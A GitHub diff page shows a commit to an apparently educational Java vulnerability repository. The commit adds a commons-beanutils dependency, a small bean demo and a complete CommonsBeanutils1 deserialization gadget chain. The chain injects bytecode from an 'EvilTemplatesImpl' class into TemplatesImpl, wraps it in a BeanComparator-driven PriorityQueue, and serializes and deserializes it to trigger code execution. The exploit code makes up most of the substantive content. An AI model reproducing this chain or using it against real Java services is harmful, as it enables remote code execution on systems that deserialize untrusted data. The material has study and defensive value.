| FazBrowse GitHub Viewer | Trending | | Home |
| Tools: [Download Repo ZIP] [Original HTTPS Page] |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -31,6 +31,11 @@ | |||
| 31 | 31 | <artifactId>commons-collections4</artifactId> | |
| 32 | 32 | <version>4.0</version> | |
| 33 | 33 | </dependency> | |
| 34 | + <dependency> | ||
| 35 | + <groupId>commons-beanutils</groupId> | ||
| 36 | + <artifactId>commons-beanutils</artifactId> | ||
| 37 | + <version>1.9.4</version> | ||
| 38 | + </dependency> | ||
| 34 | 39 | <!-- https://mvnrepository.com/artifact/javassist/javassist --> | |
| 35 | 40 | <dependency> | |
| 36 | 41 | <groupId>javassist</groupId> | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -0,0 +1,20 @@ | |||
| 1 | + package com.govuln.beans; | ||
| 2 | + | ||
| 3 | + import org.apache.commons.beanutils.PropertyUtils; | ||
| 4 | + | ||
| 5 | + final public class Cat { | ||
| 6 | + private String name = "catalina"; | ||
| 7 | + | ||
| 8 | + public String getName() { | ||
| 9 | + return name; | ||
| 10 | + } | ||
| 11 | + | ||
| 12 | + public void setName(String name) { | ||
| 13 | + this.name = name; | ||
| 14 | + } | ||
| 15 | + | ||
| 16 | + public static void main(String []args) throws Exception { | ||
| 17 | + Cat cat = new Cat(); | ||
| 18 | + System.out.println(PropertyUtils.getProperty(cat, "name")); | ||
| 19 | + } | ||
| 20 | + } | ||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -0,0 +1,53 @@ | |||
| 1 | + package com.govuln.deserialization; | ||
| 2 | + | ||
| 3 | + import java.io.ByteArrayInputStream; | ||
| 4 | + import java.io.ByteArrayOutputStream; | ||
| 5 | + import java.io.ObjectInputStream; | ||
| 6 | + import java.io.ObjectOutputStream; | ||
| 7 | + import java.lang.reflect.Field; | ||
| 8 | + import java.util.PriorityQueue; | ||
| 9 | + | ||
| 10 | + import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; | ||
| 11 | + import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; | ||
| 12 | + import javassist.ClassPool; | ||
| 13 | + import javassist.CtClass; | ||
| 14 | + import org.apache.commons.beanutils.BeanComparator; | ||
| 15 | + | ||
| 16 | + public class CommonsBeanutils1 { | ||
| 17 | + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { | ||
| 18 | + Field field = obj.getClass().getDeclaredField(fieldName); | ||
| 19 | + field.setAccessible(true); | ||
| 20 | + field.set(obj, value); | ||
| 21 | + } | ||
| 22 | + | ||
| 23 | + protected static byte[] getBytescode() throws Exception { | ||
| 24 | + ClassPool pool = ClassPool.getDefault(); | ||
| 25 | + CtClass clazz = pool.get(evil.EvilTemplatesImpl.class.getName()); | ||
| 26 | + return clazz.toBytecode(); | ||
| 27 | + } | ||
| 28 | + | ||
| 29 | + public static void main(String[] args) throws Exception { | ||
| 30 | + TemplatesImpl obj = new TemplatesImpl(); | ||
| 31 | + setFieldValue(obj, "_bytecodes", new byte[][]{getBytescode()}); | ||
| 32 | + setFieldValue(obj, "_name", "HelloTemplatesImpl"); | ||
| 33 | + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); | ||
| 34 | + | ||
| 35 | + final BeanComparator comparator = new BeanComparator(); | ||
| 36 | + final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator); | ||
| 37 | + // stub data for replacement later | ||
| 38 | + queue.add(1); | ||
| 39 | + queue.add(1); | ||
| 40 | + | ||
| 41 | + setFieldValue(comparator, "property", "outputProperties"); | ||
| 42 | + setFieldValue(queue, "queue", new Object[]{obj, obj}); | ||
| 43 | + | ||
| 44 | + ByteArrayOutputStream barr = new ByteArrayOutputStream(); | ||
| 45 | + ObjectOutputStream oos = new ObjectOutputStream(barr); | ||
| 46 | + oos.writeObject(queue); | ||
| 47 | + oos.close(); | ||
| 48 | + | ||
| 49 | + System.out.println(barr); | ||
| 50 | + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); | ||
| 51 | + Object o = (Object)ois.readObject(); | ||
| 52 | + } | ||
| 53 | + } | ||
| Back | FazBrowse Home | New Git URL |
0 commit comments